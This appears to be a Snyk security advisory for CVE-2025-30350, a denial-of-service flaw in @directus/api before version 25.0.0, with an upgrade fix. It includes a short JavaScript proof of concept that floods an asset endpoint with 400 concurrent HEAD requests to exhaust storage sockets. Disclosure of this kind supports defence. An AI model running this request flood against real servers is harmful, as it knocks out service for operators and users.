Homepage

Allocation of Resources Without Limits or Throttling Affecting @directus/api package, versions <25.0.0

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Allocation of Resources Without Limits or Throttling vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-DIRECTUSAPI-9534207
  • published27 Mar 2025
  • disclosed26 Mar 2025
  • creditJosé Varela
Report a new vulnerability Found a mistake?

Introduced: 26 Mar 2025

NewCVE-2025-30350  (opens in a new tab)
CWE-770  (opens in a new tab)

How to fix?

Upgrade @directus/api to version 25.0.0 or higher.

Overview

@directus/api is a real-time API and App dashboard for managing SQL database content

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can cause the service to deny access to stored assets by overwhelming the server with a burst of HEAD requests, leading to a saturation of available sockets.

PoC

  1. setup AWS S3 storage

  2. set STORAGE_CLOUD_MAX_SOCKETS: "50" (this value is lower than default for easier reproduction)

  3. upload a file to your project

  4. run this file (Replace the the file ID with the one you just uploaded):

import axios from "axios";


async function start() {
  Array.from({ length: 400 }, (_, i) => {
    axios
      .head(
        "http://localhost:8055/assets/e536aa35-3a81-4fa9-b856-3780584d38d8"
      )
      .then(() => console.log("✅"))
      .catch((e) =>
        console.log("⛔", e.response?.status || e.code || e.message)
      );
  });
}


start();

References

CVSS Base Scores

version 4.0
version 3.1